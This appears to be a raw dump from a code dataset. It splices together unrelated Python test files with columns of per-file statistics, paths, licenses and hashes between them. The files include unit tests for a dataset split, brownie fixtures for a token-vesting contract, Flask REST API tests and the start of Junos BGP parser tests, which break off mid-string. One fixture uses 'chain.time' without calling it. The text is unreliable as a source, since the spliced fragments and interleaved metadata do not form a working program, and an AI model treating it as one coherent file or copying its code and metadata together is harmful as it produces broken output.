        self.assertEqual(ds.train_y, None)
        self.assertEqual(ds.test_y, None)

    def test_prespecified_split_three(self):
        """Caller-supplied index arrays drive the three-way split exactly."""
        df = generate_simple_pd_dataframe()
        ds = tdml.Dataset(df, label="Evaluation")
        ds.transform()
        indices = np.arange(10)
        train_split = indices[:6]
        val_split = indices[6:8]
        test_split = indices[8:]
        ds.train_val_test_split(train_split=train_split, val_split=val_split, test_split=test_split)
        self.assertEqual(ds.train_x.shape, (6, 4))
        self.assertEqual(ds.val_x.shape, (2, 4))
        self.assertEqual(ds.test_x.shape, (2, 4))
        self.assertEqual(ds.train_y.shape, (6, ))
        self.assertEqual(ds.val_y.shape, (2, ))
        self.assertEqual(ds.test_y.shape, (2, ))
        ds = tdml.Dataset(df)
        ds.transform()
        ds.train_val_test_split(train_split=train_split, val_split=val_split, test_split=test_split)
        self.assertEqual(ds.train_x.shape, (6, 5))
        self.assertEqual(ds.val_x.shape, (2, 5))
        self.assertEqual(ds.test_x.shape, (2, 5))
        self.assertEqual(ds.train_y, None)
        self.assertEqual(ds.val_y, None)
        self.assertEqual(ds.test_y, None)

    def test_reshuffle(self):
        """reshuffle() permutes the training indices without changing size."""
        df = generate_simple_pd_dataframe()
        ds = tdml.Dataset(df, label="Evaluation")
        ds.transform()
        indices = np.arange(10)
        train_split = indices[:6]
        val_split = indices[6:8]
        test_split = indices[8:]
        ds.train_val_test_split(train_split=train_split, val_split=val_split, test_split=test_split)
        ds.reshuffle(seed=1)
        self.assertTrue(not np.array_equal(ds._reshuffle_indices, train_split))
        self.assertEqual(len(ds._reshuffle_indices), len(train_split))

    def test_text(self):
        """Text columns map to index ranges via default or custom embeddings."""
        # Default transformation
        df = pd.read_csv('data/simple_text.csv')
        ds = tdml.Dataset(df, label='Broken', text="Description")
        ds.transform()
        self.assertTrue('Description' in ds.feature_mapping)
        self.assertEqual(ds.idx_to_feature((4, 20)), 'Description')
        self.assertEqual(ds.feature_to_idx('Description'), (4, 20))
        # Customized transformation
        ds = tdml.Dataset(df, text="Description")
        ds.transform(text_transform=simple_embedding, val=-1, dim=8)
        self.assertTrue('Description' in ds.feature_mapping)
        self.assertEqual(ds.idx_to_feature((5, 13)), 'Description')
        self.assertEqual(ds.feature_to_idx('Description'), (5, 13))
# Allow running this test module directly, outside a test-runner harness.
if __name__ == '__main__':
    unittest.main()
| 32.66129
| 143
| 0.712346
| 1,272
| 8,100
| 4.343553
| 0.081761
| 0.225339
| 0.221538
| 0.059729
| 0.856833
| 0.837466
| 0.780633
| 0.708778
| 0.646516
| 0.612489
| 0
| 0.032203
| 0.125926
| 8,100
| 248
| 144
| 32.66129
| 0.748164
| 0.022593
| 0
| 0.580808
| 1
| 0.015152
| 0.112306
| 0.005312
| 0
| 0
| 0
| 0
| 0.434343
| 1
| 0.065657
| false
| 0
| 0.025253
| 0
| 0.09596
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
5471446bd7dab70562ac3af071c70f3245a7e8a2
| 4,041
|
py
|
Python
|
tests/smart_timelock/fixtures.py
|
EchoDao-BSC/badger-system
|
d9276c5ce2053f0f5f1eb832f6f13204d1be9489
|
[
"MIT"
] | 99
|
2020-12-02T08:40:48.000Z
|
2022-03-15T05:21:06.000Z
|
tests/smart_timelock/fixtures.py
|
EchoDao-BSC/badger-system
|
d9276c5ce2053f0f5f1eb832f6f13204d1be9489
|
[
"MIT"
] | 115
|
2020-12-15T07:15:39.000Z
|
2022-03-28T22:21:03.000Z
|
tests/smart_timelock/fixtures.py
|
EchoDao-BSC/badger-system
|
d9276c5ce2053f0f5f1eb832f6f13204d1be9489
|
[
"MIT"
] | 56
|
2020-12-11T06:50:04.000Z
|
2022-02-21T09:17:38.000Z
|
import pytest
from brownie import *
from dotmap import DotMap
@pytest.fixture(scope="module")
def timelock_unit():
    """Deploy a SmartVesting timelock test rig (module-scoped).

    Deploys TokenGifter, EthGifter, two MockTokens, SmartVesting and
    StakingMock via brownie, funds them, and yields a DotMap bundling the
    contracts, the actor accounts, and the amount parameters.

    NOTE(review): deployment order matters — gToken must exist before
    SmartVesting.initialize and the transfers below.
    """
    # Vesting unlocks ~11.5 days from the current chain time.
    unlockTime = chain.time() + 1000000
    # Actor accounts from brownie's local test chain.
    deployer = accounts[0]
    team = [accounts[1], accounts[2], accounts[3]]
    governor = accounts[5]
    minnow = accounts[4]
    tokenGifterAmount = Wei("500 ether")
    tokenRequestAmount = Wei("100 ether")
    transferAmount = Wei("500000 ether")
    tokenGifter = TokenGifter.deploy({"from": deployer})
    ethGifter = EthGifter.deploy({"from": deployer})
    gToken = MockToken.deploy({"from": deployer})
    # Mint gToken balances to the gifter and the deployer.
    gToken.initialize(
        [
            web3.toChecksumAddress(tokenGifter.address),
            web3.toChecksumAddress(deployer.address),
        ],
        [tokenGifterAmount * 2, transferAmount * 10],
        {"from": deployer},
    )
    smartVesting = SmartVesting.deploy({"from": deployer})
    smartVesting.initialize(gToken, team[0], governor, unlockTime, {"from": deployer})
    gToken.transfer(smartVesting, transferAmount)
    stakingMock = StakingMock.deploy({"from": deployer})
    stakingMock.initialize(gToken, {"from": deployer})
    deployer.transfer(ethGifter, Wei("10 ether"))
    miscToken = MockToken.deploy({"from": deployer})
    # Secondary token minted to the gifter and the vesting contract.
    miscToken.initialize(
        [
            web3.toChecksumAddress(tokenGifter.address),
            web3.toChecksumAddress(smartVesting.address),
        ],
        [tokenGifterAmount * 2, tokenGifterAmount],
        {"from": deployer},
    )
    yield DotMap(
        tokenGifter=tokenGifter,
        ethGifter=ethGifter,
        smartVesting=smartVesting,
        stakingMock=stakingMock,
        miscToken=miscToken,
        deployer=deployer,
        team=team,
        governor=governor,
        minnow=minnow,
        params={
            "tokenGifterAmount": tokenGifterAmount,
            "tokenRequestAmount": tokenRequestAmount,
            "transferAmount": transferAmount,
            "unlockTime": unlockTime,
        },
    )
@pytest.fixture(scope="module")
def vesting_unit():
start = chain.time + 1000
cliffDuration = days(30)
duration = days(335)
deployer = accounts[0]
team = [accounts[1], accounts[2], accounts[3]]
governor = accounts[5]
minnow = accounts[4]
tokenGifterAmount = Wei("500 ether")
tokenRequestAmount = Wei("100 ether")
transferAmount = Wei("500000 ether")
tokenGifter = TokenGifter.deploy({"from": deployer})
ethGifter = EthGifter.deploy({"from": deployer})
gToken = MockToken.deploy({"from": deployer})
gToken.initialize(
[
web3.toChecksumAddress(tokenGifter.address),
web3.toChecksumAddress(deployer.address),
],
[tokenGifterAmount * 2, transferAmount * 10],
{"from": deployer},
)
smartVesting = SmartVesting.deploy({"from": deployer})
smartVesting.initialize(
gToken, team[0], governor, start, cliffDuration, duration, {"from": deployer}
)
gToken.transfer(smartVesting, transferAmount)
stakingMock = StakingMock.deploy({"from": deployer})
stakingMock.initialize(gToken, {"from": deployer})
deployer.transfer(ethGifter, Wei("10 ether"))
miscToken = MockToken.deploy({"from": deployer})
miscToken.initialize(
[
web3.toChecksumAddress(tokenGifter.address),
web3.toChecksumAddress(smartVesting.address),
],
[tokenGifterAmount * 2, tokenGifterAmount],
{"from": deployer},
)
yield DotMap(
tokenGifter=tokenGifter,
ethGifter=ethGifter,
smartVesting=smartVesting,
stakingMock=stakingMock,
miscToken=miscToken,
deployer=deployer,
team=team,
governor=governor,
minnow=minnow,
params={
"tokenGifterAmount": tokenGifterAmount,
"tokenRequestAmount": tokenRequestAmount,
"transferAmount": transferAmount,
"start": start,
"cliffDuration": cliffDuration,
"duration": duration,
},
)
| 29.282609
| 86
| 0.628557
| 327
| 4,041
| 7.761468
| 0.17737
| 0.094563
| 0.085106
| 0.037825
| 0.897557
| 0.876281
| 0.876281
| 0.876281
| 0.876281
| 0.876281
| 0
| 0.024479
| 0.251918
| 4,041
| 137
| 87
| 29.49635
| 0.815084
| 0
| 0
| 0.747826
| 0
| 0
| 0.074734
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017391
| false
| 0
| 0.026087
| 0
| 0.043478
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
547595b76b3f4373c58cc6d38ec6a2f7d54fcaa3
| 91
|
py
|
Python
|
diy_programs/diy_7_fns_p4.py
|
bhalajin/blueprints
|
7ad1d7860aafbb4c333de9efbbb7e546ed43c569
|
[
"MIT"
] | null | null | null |
diy_programs/diy_7_fns_p4.py
|
bhalajin/blueprints
|
7ad1d7860aafbb4c333de9efbbb7e546ed43c569
|
[
"MIT"
] | null | null | null |
diy_programs/diy_7_fns_p4.py
|
bhalajin/blueprints
|
7ad1d7860aafbb4c333de9efbbb7e546ed43c569
|
[
"MIT"
] | null | null | null |
def doubleparams(param):
return param*2
print(doubleparams(10))
print(doubleparams('10'))
| 18.2
| 25
| 0.769231
| 12
| 91
| 5.833333
| 0.583333
| 0.485714
| 0.542857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059524
| 0.076923
| 91
| 5
| 25
| 18.2
| 0.77381
| 0
| 0
| 0
| 0
| 0
| 0.021739
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0.25
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
|
0
| 7
|
5488eb5b63bca495647d82d848e5c7f62e0fc95d
| 32
|
py
|
Python
|
MyPackage/pkg2/hello.py
|
hisplan/py-packaging-template
|
1ffc8c4f834959b781039cbecc8fc6d79f5ba9fe
|
[
"MIT"
] | null | null | null |
MyPackage/pkg2/hello.py
|
hisplan/py-packaging-template
|
1ffc8c4f834959b781039cbecc8fc6d79f5ba9fe
|
[
"MIT"
] | null | null | null |
MyPackage/pkg2/hello.py
|
hisplan/py-packaging-template
|
1ffc8c4f834959b781039cbecc8fc6d79f5ba9fe
|
[
"MIT"
] | null | null | null |
def bar():
return "Hello, bar!"
| 16
| 21
| 0.625
| 5
| 32
| 4
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15625
| 32
| 2
| 21
| 16
| 0.740741
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
549362aad173dd59ea22b0212ba1b5ebee267ec1
| 171
|
py
|
Python
|
tests/__init__.py
|
ahupp/pegen
|
e28fe4fb1972c55af5ddb6a7bdd9cba4ea072b81
|
[
"MIT"
] | 106
|
2020-05-14T03:43:47.000Z
|
2022-03-26T21:46:47.000Z
|
tests/__init__.py
|
ahupp/pegen
|
e28fe4fb1972c55af5ddb6a7bdd9cba4ea072b81
|
[
"MIT"
] | 60
|
2020-05-07T23:17:46.000Z
|
2022-03-30T20:26:25.000Z
|
tests/__init__.py
|
ahupp/pegen
|
e28fe4fb1972c55af5ddb6a7bdd9cba4ea072b81
|
[
"MIT"
] | 20
|
2020-05-22T10:21:30.000Z
|
2022-03-26T21:23:44.000Z
|
import os
from test.support import load_package_tests
# Load all tests in package
def load_tests(*args):
return load_package_tests(os.path.dirname(__file__), *args)
| 21.375
| 63
| 0.783626
| 27
| 171
| 4.62963
| 0.592593
| 0.176
| 0.256
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134503
| 171
| 7
| 64
| 24.428571
| 0.844595
| 0.146199
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
54bc46427faf302634295a70bd1bcdba4dcecf6e
| 18,545
|
py
|
Python
|
tests/test_api.py
|
derwolfe/api-pycon2014
|
ec7efda1fda87244cdf4d8a2b0f48927c2edb835
|
[
"MIT"
] | 1
|
2019-01-21T04:58:27.000Z
|
2019-01-21T04:58:27.000Z
|
tests/test_api.py
|
derwolfe/api-pycon2014
|
ec7efda1fda87244cdf4d8a2b0f48927c2edb835
|
[
"MIT"
] | null | null | null |
tests/test_api.py
|
derwolfe/api-pycon2014
|
ec7efda1fda87244cdf4d8a2b0f48927c2edb835
|
[
"MIT"
] | null | null | null |
import unittest
from werkzeug.exceptions import BadRequest
from .test_client import TestClient
from api.app import create_app
from api.models import db, User
from api.errors import ValidationError
class TestAPI(unittest.TestCase):
default_username = 'dave'
default_password = 'cat'
def setUp(self):
self.app = create_app('test_config')
self.ctx = self.app.app_context()
self.ctx.push()
db.drop_all()
db.create_all()
u = User(username=self.default_username,
password=self.default_password)
db.session.add(u)
db.session.commit()
self.client = TestClient(self.app, u.generate_auth_token(), '')
def tearDown(self):
db.session.remove()
db.drop_all()
self.ctx.pop()
def test_password_auth(self):
self.app.config['USE_TOKEN_AUTH'] = False
good_client = TestClient(self.app, self.default_username,
self.default_password)
rv, json = good_client.get('/api/v1.0/students/')
self.assertTrue(rv.status_code == 200)
self.app.config['USE_TOKEN_AUTH'] = True
u = User.query.get(1)
good_client = TestClient(self.app, u.generate_auth_token(), '')
rv, json = good_client.get('/api/v1.0/students/')
self.assertTrue(rv.status_code == 200)
def test_bad_auth(self):
bad_client = TestClient(self.app, 'abc', 'def')
rv, json = bad_client.get('/api/v1.0/students/')
self.assertTrue(rv.status_code == 401)
self.app.config['USE_TOKEN_AUTH'] = True
bad_client = TestClient(self.app, 'bad_token', '')
rv, json = bad_client.get('/api/v1.0/students/')
self.assertTrue(rv.status_code == 401)
def test_students(self):
# get collection
rv, json = self.client.get('/api/v1.0/students/')
self.assertTrue(rv.status_code == 200)
self.assertTrue(json['urls'] == [])
# create new
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'susan'})
self.assertTrue(rv.status_code == 201)
susan_url = rv.headers['Location']
# get
rv, json = self.client.get(susan_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(json['name'] == 'susan')
self.assertTrue(json['url'] == susan_url)
# create new
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'david'})
self.assertTrue(rv.status_code == 201)
david_url = rv.headers['Location']
# get
rv, json = self.client.get(david_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(json['name'] == 'david')
self.assertTrue(json['url'] == david_url)
# create bad
self.assertRaises(BadRequest, lambda:
self.client.post('/api/v1.0/students/', data={}))
self.assertRaises(ValidationError, lambda:
self.client.post('/api/v1.0/students/',
data={'not-name': 'david'}))
# modify
rv, json = self.client.put(david_url, data={'name': 'david2'})
self.assertTrue(rv.status_code == 200)
# get
rv, json = self.client.get(david_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(json['name'] == 'david2')
# get collection
rv, json = self.client.get('/api/v1.0/students/')
self.assertTrue(rv.status_code == 200)
self.assertTrue(susan_url in json['urls'])
self.assertTrue(david_url in json['urls'])
self.assertTrue(len(json['urls']) == 2)
# delete
rv, json = self.client.delete(susan_url)
self.assertTrue(rv.status_code == 200)
# get collection
rv, json = self.client.get('/api/v1.0/students/')
self.assertTrue(rv.status_code == 200)
self.assertFalse(susan_url in json['urls'])
self.assertTrue(david_url in json['urls'])
self.assertTrue(len(json['urls']) == 1)
def test_classes(self):
# get collection
rv, json = self.client.get('/api/v1.0/classes/')
self.assertTrue(rv.status_code == 200)
self.assertTrue(json['urls'] == [])
# create new
rv, json = self.client.post('/api/v1.0/classes/',
data={'name': 'algebra'})
self.assertTrue(rv.status_code == 201)
algebra_url = rv.headers['Location']
# get
rv, json = self.client.get(algebra_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(json['name'] == 'algebra')
self.assertTrue(json['url'] == algebra_url)
# create new
rv, json = self.client.post('/api/v1.0/classes/',
data={'name': 'lit'})
self.assertTrue(rv.status_code == 201)
lit_url = rv.headers['Location']
# get
rv, json = self.client.get(lit_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(json['name'] == 'lit')
self.assertTrue(json['url'] == lit_url)
# create bad
self.assertRaises(BadRequest, lambda:
self.client.post('/api/v1.0/classes/', data={}))
self.assertRaises(ValidationError, lambda:
self.client.post('/api/v1.0/classes/', data={'not-name': 'lit'}))
# modify
rv, json = self.client.put(lit_url, data={'name': 'lit2'})
self.assertTrue(rv.status_code == 200)
# get
rv, json = self.client.get(lit_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(json['name'] == 'lit2')
# get collection
rv, json = self.client.get('/api/v1.0/classes/')
self.assertTrue(rv.status_code == 200)
self.assertTrue(algebra_url in json['urls'])
self.assertTrue(lit_url in json['urls'])
self.assertTrue(len(json['urls']) == 2)
# delete
rv, json = self.client.delete(lit_url)
self.assertTrue(rv.status_code == 200)
# get collection
rv, json = self.client.get('/api/v1.0/classes/')
self.assertTrue(rv.status_code == 200)
self.assertTrue(algebra_url in json['urls'])
self.assertFalse(lit_url in json['urls'])
self.assertTrue(len(json['urls']) == 1)
def test_registrations(self):
# create new students
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'susan'})
self.assertTrue(rv.status_code == 201)
susan_url = rv.headers['Location']
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'david'})
self.assertTrue(rv.status_code == 201)
david_url = rv.headers['Location']
# create new classes
rv, json = self.client.post('/api/v1.0/classes/',
data={'name': 'algebra'})
self.assertTrue(rv.status_code == 201)
algebra_url = rv.headers['Location']
rv, json = self.client.post('/api/v1.0/classes/',
data={'name': 'lit'})
self.assertTrue(rv.status_code == 201)
lit_url = rv.headers['Location']
# register students to classes
rv, json = self.client.post('/api/v1.0/registrations/',
data={'student': susan_url,
'class': algebra_url})
self.assertTrue(rv.status_code == 201)
susan_in_algebra_url = rv.headers['Location']
rv, json = self.client.post('/api/v1.0/registrations/',
data={'student': susan_url,
'class': lit_url})
self.assertTrue(rv.status_code == 201)
susan_in_lit_url = rv.headers['Location']
rv, json = self.client.post('/api/v1.0/registrations/',
data={'student': david_url,
'class': algebra_url})
self.assertTrue(rv.status_code == 201)
david_in_algebra_url = rv.headers['Location']
# get registration
rv, json = self.client.get(susan_in_lit_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(json['student'] == susan_url)
self.assertTrue(json['class'] == lit_url)
# get collection
rv, json = self.client.get('/api/v1.0/registrations/')
self.assertTrue(rv.status_code == 200)
self.assertTrue(susan_in_algebra_url in json['urls'])
self.assertTrue(susan_in_lit_url in json['urls'])
self.assertTrue(david_in_algebra_url in json['urls'])
self.assertTrue(len(json['urls']) == 3)
# bad registrations
self.assertRaises(BadRequest, lambda:
self.client.post('/api/v1.0/registrations/', data={}))
self.assertRaises(ValidationError, lambda:
self.client.post('/api/v1.0/registrations/',
data={'student': david_url}))
self.assertRaises(ValidationError, lambda:
self.client.post('/api/v1.0/registrations/',
data={'class': algebra_url}))
self.assertRaises(ValidationError, lambda:
self.client.post('/api/v1.0/registrations/',
data={'student': david_url, 'class': 'bad-url'}))
self.assertRaises(ValidationError, lambda:
self.client.post('/api/v1.0/registrations/',
data={'student': david_url,
'class': algebra_url + '1'}))
db.session.remove()
# get classes from each student
rv, json = self.client.get(susan_url)
self.assertTrue(rv.status_code == 200)
susans_reg_url = json['registrations']
rv, json = self.client.get(susans_reg_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(susan_in_algebra_url in json['urls'])
self.assertTrue(susan_in_lit_url in json['urls'])
self.assertTrue(len(json['urls']) == 2)
rv, json = self.client.get(david_url)
self.assertTrue(rv.status_code == 200)
davids_reg_url = json['registrations']
rv, json = self.client.get(davids_reg_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(david_in_algebra_url in json['urls'])
self.assertTrue(len(json['urls']) == 1)
# get students for each class
rv, json = self.client.get(algebra_url)
self.assertTrue(rv.status_code == 200)
algebras_reg_url = json['registrations']
rv, json = self.client.get(algebras_reg_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(susan_in_algebra_url in json['urls'])
self.assertTrue(david_in_algebra_url in json['urls'])
self.assertTrue(len(json['urls']) == 2)
rv, json = self.client.get(lit_url)
self.assertTrue(rv.status_code == 200)
lits_reg_url = json['registrations']
rv, json = self.client.get(lits_reg_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(susan_in_lit_url in json['urls'])
self.assertTrue(len(json['urls']) == 1)
# unregister students
rv, json = self.client.delete(susan_in_algebra_url)
self.assertTrue(rv.status_code == 200)
rv, json = self.client.delete(david_in_algebra_url)
self.assertTrue(rv.status_code == 200)
# get collection
rv, json = self.client.get('/api/v1.0/registrations/')
self.assertTrue(rv.status_code == 200)
self.assertFalse(susan_in_algebra_url in json['urls'])
self.assertTrue(susan_in_lit_url in json['urls'])
self.assertFalse(david_in_algebra_url in json['urls'])
self.assertTrue(len(json['urls']) == 1)
# delete student
rv, json = self.client.delete(susan_url)
self.assertTrue(rv.status_code == 200)
# get collection
rv, json = self.client.get('/api/v1.0/registrations/')
self.assertTrue(rv.status_code == 200)
self.assertTrue(len(json['urls']) == 0)
def test_rate_limits(self):
self.app.config['USE_RATE_LIMITS'] = True
rv, json = self.client.get('/api/v1.0/registrations/')
self.assertTrue(rv.status_code == 200)
self.assertTrue('X-RateLimit-Remaining' in rv.headers)
self.assertTrue('X-RateLimit-Limit' in rv.headers)
self.assertTrue('X-RateLimit-Reset' in rv.headers)
self.assertTrue(int(rv.headers['X-RateLimit-Limit']) == int(rv.headers['X-RateLimit-Remaining']) + 1)
while int(rv.headers['X-RateLimit-Remaining']) > 0:
rv, json = self.client.get('/api/v1.0/registrations/')
self.assertTrue(rv.status_code == 429)
def test_pagination(self):
# create several students
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'one'})
self.assertTrue(rv.status_code == 201)
one_url = rv.headers['Location']
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'two'})
self.assertTrue(rv.status_code == 201)
two_url = rv.headers['Location']
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'three'})
self.assertTrue(rv.status_code == 201)
three_url = rv.headers['Location']
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'four'})
self.assertTrue(rv.status_code == 201)
four_url = rv.headers['Location']
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'five'})
self.assertTrue(rv.status_code == 201)
five_url = rv.headers['Location']
# get collection in pages
rv, json = self.client.get('/api/v1.0/students/?page=1&per_page=2')
self.assertTrue(rv.status_code == 200)
self.assertTrue(one_url in json['urls'])
self.assertTrue(two_url in json['urls'])
self.assertTrue(len(json['urls']) == 2)
self.assertTrue('total' in json['meta'])
self.assertTrue(json['meta']['total'] == 5)
self.assertTrue('prev' in json['meta'])
self.assertTrue(json['meta']['prev'] is None)
first_url = json['meta']['first'].replace('http://localhost', '')
last_url = json['meta']['last'].replace('http://localhost', '')
next_url = json['meta']['next'].replace('http://localhost', '')
rv, json = self.client.get(first_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(one_url in json['urls'])
self.assertTrue(two_url in json['urls'])
self.assertTrue(len(json['urls']) == 2)
rv, json = self.client.get(next_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(three_url in json['urls'])
self.assertTrue(four_url in json['urls'])
self.assertTrue(len(json['urls']) == 2)
next_url = json['meta']['next'].replace('http://localhost', '')
rv, json = self.client.get(next_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(five_url in json['urls'])
self.assertTrue(len(json['urls']) == 1)
rv, json = self.client.get(last_url)
self.assertTrue(rv.status_code == 200)
self.assertTrue(five_url in json['urls'])
self.assertTrue(len(json['urls']) == 1)
def test_cache_control(self):
client = TestClient(self.app, self.default_username,
self.default_password)
rv, json = client.get('/auth/request-token')
self.assertTrue(rv.status_code == 200)
self.assertTrue('Cache-Control' in rv.headers)
cache = [c.strip() for c in rv.headers['Cache-Control'].split(',')]
self.assertTrue('no-cache' in cache)
self.assertTrue('no-store' in cache)
self.assertTrue('max-age=0' in cache)
self.assertTrue(len(cache) == 3)
def test_etag(self):
# create two students
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'one'})
self.assertTrue(rv.status_code == 201)
one_url = rv.headers['Location']
rv, json = self.client.post('/api/v1.0/students/',
data={'name': 'two'})
self.assertTrue(rv.status_code == 201)
two_url = rv.headers['Location']
# get their etags
rv, json = self.client.get(one_url)
self.assertTrue(rv.status_code == 200)
one_etag = rv.headers['ETag']
rv, json = self.client.get(two_url)
self.assertTrue(rv.status_code == 200)
two_etag = rv.headers['ETag']
# send If-None-Match header
rv, json = self.client.get(one_url, headers={
'If-None-Match': one_etag})
self.assertTrue(rv.status_code == 304)
rv, json = self.client.get(one_url, headers={
'If-None-Match': one_etag + ', ' + two_etag})
self.assertTrue(rv.status_code == 304)
rv, json = self.client.get(one_url, headers={
'If-None-Match': two_etag})
self.assertTrue(rv.status_code == 200)
rv, json = self.client.get(one_url, headers={
'If-None-Match': two_etag + ', *'})
self.assertTrue(rv.status_code == 304)
# send If-Match header
rv, json = self.client.get(one_url, headers={
'If-Match': one_etag})
self.assertTrue(rv.status_code == 200)
rv, json = self.client.get(one_url, headers={
'If-Match': one_etag + ', ' + two_etag})
self.assertTrue(rv.status_code == 200)
rv, json = self.client.get(one_url, headers={
'If-Match': two_etag})
self.assertTrue(rv.status_code == 412)
rv, json = self.client.get(one_url, headers={
'If-Match': '*'})
self.assertTrue(rv.status_code == 200)
# change a resource
rv, json = self.client.put(one_url, data={'name': 'not-one'})
self.assertTrue(rv.status_code == 200)
# use stale etag
rv, json = self.client.get(one_url, headers={
'If-None-Match': one_etag})
self.assertTrue(rv.status_code == 200)
| 40.315217
| 109
| 0.573146
| 2,272
| 18,545
| 4.551056
| 0.069982
| 0.189555
| 0.112959
| 0.155319
| 0.837911
| 0.814217
| 0.771277
| 0.743037
| 0.727176
| 0.692263
| 0
| 0.024961
| 0.278458
| 18,545
| 459
| 110
| 40.40305
| 0.747777
| 0.033001
| 0
| 0.628242
| 0
| 0
| 0.118837
| 0.02303
| 0
| 0
| 0
| 0
| 0.440922
| 1
| 0.0317
| false
| 0.014409
| 0.017291
| 0
| 0.057637
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b7234751fada3e49671e5e58af192cb15feff614
| 61,004
|
py
|
Python
|
src/genie/libs/parser/junos/tests/test_show_bgp.py
|
noziwatele/genieparser
|
4d7a62a870b30dfc8e2a41bf1ad81218bca6f5e9
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/junos/tests/test_show_bgp.py
|
noziwatele/genieparser
|
4d7a62a870b30dfc8e2a41bf1ad81218bca6f5e9
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/junos/tests/test_show_bgp.py
|
noziwatele/genieparser
|
4d7a62a870b30dfc8e2a41bf1ad81218bca6f5e9
|
[
"Apache-2.0"
] | null | null | null |
# Python
import unittest
from unittest.mock import Mock
# ATS
from pyats.topology import Device
from pyats.topology import loader
# Metaparser
from genie.metaparser.util.exceptions import SchemaEmptyParserError
# junos show_ospf
from genie.libs.parser.junos.show_bgp import (ShowBgpGroupBrief,
ShowBgpGroupDetail,
ShowBgpGroupSummary)
class TestShowBgpGroupBrief(unittest.TestCase):
""" Unit tests for:
* show bgp group brief | no-more
"""
maxDiff = None
device = Device(name='aDevice')
empty_output = {'execute.return_value': ''}
golden_output = {'execute.return_value': '''
Group Type: Internal AS: 65171 Local AS: 65171
Name: Genie Index: 0 Flags: <Export Eval>
Export: [ (v4_WATARI && NEXT-HOP-SELF) ]
Options: <Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 1
10.189.5.253+179
inet.0: 0/682/682/0
Group Type: Internal AS: 65171 Local AS: 65171
Name: v6_Genie Index: 1 Flags: <Export Eval>
Export: [ (v6_WATARI && NEXT-HOP-SELF) ]
Options: <Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 1
2001:db8:223c:ca45::c+60268
inet6.0: 0/0/0/0
Group Type: Internal AS: 65171 Local AS: 65171
Name: v4_RRC_72_TRIANGLE Index: 2 Flags: <Export Eval>
Export: [ (ALL_out && v4_NEXT-HOP-SELF_hktGCS001) ]
Options: <Cluster Confed>
Options: <GracefulShutdownRcv>
